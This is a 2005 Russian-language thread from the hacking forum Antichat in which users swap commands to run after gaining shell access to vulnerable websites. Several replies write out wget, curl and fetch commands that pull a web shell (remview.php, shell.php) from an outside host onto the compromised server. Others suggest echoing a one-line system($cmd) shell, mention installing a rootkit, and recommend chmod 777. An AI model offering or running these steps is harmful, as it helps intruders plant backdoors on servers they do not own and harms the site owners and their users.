Форум АНТИЧАТ - Команды.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Команды. (https://forum.antichat.xyz/showthread.php?t=6243)

gangster!

26.04.2005 16:00

Команды.

Какие команды можно выполнять на шеллах или найденных уязвимостях ! Допустим я знаю такие команды как pwd , echo , ls -la , wget , cd ,cat.. Но это все команды для листания !! А какими командами можно сливать или заливать файлы на сайт ! Например на некоторых сайтах wget не работает а если я пишу curl -o ./remview.php http://mysite/remview.php то заливается но при попытке обрашения к нему выдает ошибку 302 : Found
The document has moved here

KEZ	26.04.2005 16:50

Ну тут нужны прямые руки а не банальное знание команд.
Например утилита wget (часто /usr/bin/wget) может скачать по http файл и положить его в папку... Например wget http://.../remview.php -o remview.php
также можно качать файлы lynx'ом (текстовой браузер, мой любимый)
и другими прогами...
/usr/bin/ps пок. список процессов... если тебе нужно поставить хороший руткит, это тоже в аську сдесь долго писать
ещё
можно использовать echo ))

проверь, какие утилиты есть в с-ме: which wget
если все ок, тебе покажут /usr/bin/wget

coyl	26.04.2005 20:28

да. у меня похожая проблема. КЕЗ, напипши, пожалуйста как посмотреть какие ваще утилиты установленны. например про вгет и кёрл можно узнать через phpinfo()...
И еще у меня конкретный вопрос: на серваке не стоит ни вгет ни кёрл... через чё можно файло закачивать, что стоит в большинстве систем?

Morph

27.04.2005 06:15

ЭЭЭэ погодите это все конечно хорошо но при чем тут Взлом Форумов?
Переезжаем.

coyl	28.04.2005 19:39

переехать то переехал, но тему так и не раскрыли =)

Trinux

28.04.2005 19:47

Я ваще с линуом немного на ВЫ, но когда было дело юзал в оснавном:
wget - заливал (если нет его, то средствами php или mysql, смотря куда есть доступ)
tar, gzip - архиваторы
cp - копирование
chmod - сменить чмод файла
mkdir - создать диру
ну и в остальном всякие типа mysqdump итп, не имеющие отношения к линю. Но чаще всего это cd, cat, ls

BNF	28.04.2005 20:28

можно ещё такое:

** Записать новую инфу в файл:
echo "my new file content" > file.txt

** Дописать в конец файла:
echo "my add file content" >> file.txt

** Ещё есть замечательная команда: man :D Например:
man lynx ;)

** Запуск какой-то утилиты в фоне (на конце знак бэкграунд процесса):
/usr/bin/some_util &

** Полезная команда смены прав:
chmod 777 file1 file2 file3...

Fan	30.04.2005 20:02

не понимаю людей короые заливают шелл из одной строчки (system($cmd)) вгетом... а потом кричат что не работает. echo не судьба юзать?

JayTi

16.07.2005 07:40

wget http://xxxx.xxx/shell.php
curl http://xxxx.xxx/shell.php без всяких -o
fetch http://xxxx.xxx/shell.php - вот была сегодня одна только качалка на сервере

Время: 09:29